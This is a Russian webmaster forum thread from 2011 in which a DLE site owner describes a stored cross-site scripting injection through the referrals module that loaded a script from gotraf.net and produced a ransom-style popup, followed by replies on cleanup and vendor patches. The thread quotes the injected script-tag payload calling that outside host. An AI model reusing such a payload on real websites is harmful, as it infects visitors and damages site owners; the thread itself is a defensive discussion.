Как я словил вирус на комп от своего сайта
Страницы: 1
Как я словил вирус на комп от своего сайта
Открыл я вчера в IE свой сайт, и IE спросил у меня разрешение на запуск скрипта со стороннего сайта. Перерыл в (просмотр html-кода) все скрипты на странице, и нашёл в выводе модуля переходы (у меня dle) такую строку
Код
» <a href="/">g<sc ript src=http://gotraf.net/in.php?id=234></script></a><br />
Как я понял, кто то перешёл на мой сайт по запросу g<sc ript src=http://gotraf.net/in.php?id=234></script>. Пока пытался понять либо сайт пытаются взломать либо вирус внедрить, уже всплыло окно, сообщающее мне, что я должен денег. Что то типа за то, что распостранял порнуху. Нод 32 с последними базами отмолчался в этот момент. Ну вирусняк то стандартный, правда всё равно день на него убил, но напрягает эта уязвимость. И потом, если бот ПС в такой момент на сайт заглянет, ведь сайт в распостранении вирусов обвинят. И чё делать? модуль убирать или может какие его доработки существуют? Вобщем, если кто сталкивался, отпишитесь, буду признателен.
Изменено: daden11 - 12 Июля 2011 17:56
У меня тоже такое было, всё почистил. Но вот как избавиться от етой уязвимости?
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).
Изменено: daden11 - 12 Июля 2011 22:37
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html
Блин, накаркал. Яша заметил эту шляпу,
Рисунок

и трафик сразу вниз пошёл (на картинке пользователи онлайн)
Рисунок

в ВМ появилось предупреждение о вирусе с кнопкой перепроверить. Написано,что перепроверка идёт пару дней. Вылезу ли из этого дерьма без потерь или нет, время покажет. Короче, думаю, что всё это происки конкурентов.
Изменено: daden11 - 13 Июля 2011 16:34
Цитата
daden11 пишет:
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).

Нужно через поиск у админ-панели у настройке етого модуля найти переход с етим запросом и удалить его. После етого у меня антивирус перестал выдавать сообщение о заражённом сайте.
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.
Цитата
daden11 пишет:
И чё делать? модуль убирать

Яша за него уже наказывае... smile:)
Цитата
maxim maxim пишет:
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.

я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.
Цитата
Arte пишет:
Яша за него уже наказывае..

я вывод модуля переходы сделал сразу за topnews, и в коде он отображается так же как и topnews. Не думаю, что ПС его определят
Цитата
daden11 пишет:
я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.

Вот за ето спасибо smile:D
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
18:09 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:06 Влияние ссылок буржнете 
10:53 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
08:36 Обновления интерфейса яндекс метрики 
15:13 Рапида умерла. Куда выводить с AdSense? 
15:05 Чем заменили ТИЦ? 
15:01 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
11:54 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные 
10:21 [eBucks] Автоматический обмен криптовалют. BTC и любые альткоины. Киви, Банковские карты и др. электронные системы. 
22:15 Криптовалютный обменник Xgram.io - новое воплощение качества 
15:49 Проверка на индекс в Telegram боте @SpeedyIndexbot 
13:47 HidMark.com - естественные ссылки от 1.5$ Естественные ссылки. Крауд-маркетинг. 
12:05 USMobileSMSBot - 
11:16 4G/LTE Mobile Proxy 30+ geo  
12:30 В России снизили беспошлинный порог для онлайн-покупок 
12:25 Binance будет передавать данные о транзакциях свыше $1 тыс. 
22:48 150+ хакерских поисковых систем и инструментов 
22:43 Точные прогнозы на футбол 
19:49 Текст.ру преподнёс "подарок" 
18:12 Подтягиваем физкультурку 
13:30 Тренды заработка 2024-2025